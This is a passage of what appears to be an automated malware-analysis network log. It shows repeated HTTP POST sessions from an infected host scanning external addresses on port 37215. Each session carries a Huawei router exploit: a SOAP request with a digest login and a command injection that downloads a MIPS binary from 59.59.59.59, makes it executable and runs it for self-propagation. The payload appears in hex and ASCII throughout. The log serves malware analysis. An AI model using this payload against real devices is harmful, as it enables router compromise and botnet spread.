2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1767192.168.2.1557988157.28.145.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999160051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1768192.168.2.1560524157.94.7.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999182940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1769192.168.2.1545388197.21.43.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999222040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1770192.168.2.154068841.228.131.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999300003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1771192.168.2.155215889.1.158.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999315023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1772192.168.2.1550204157.254.242.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999351978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1773192.168.2.1545230218.75.223.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999371052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1774192.168.2.154159294.217.19.18637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999393940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1775192.168.2.1554634157.122.72.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999469995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1776192.168.2.1560218157.57.126.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999481916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1777192.168.2.1534076164.82.51.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999717951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
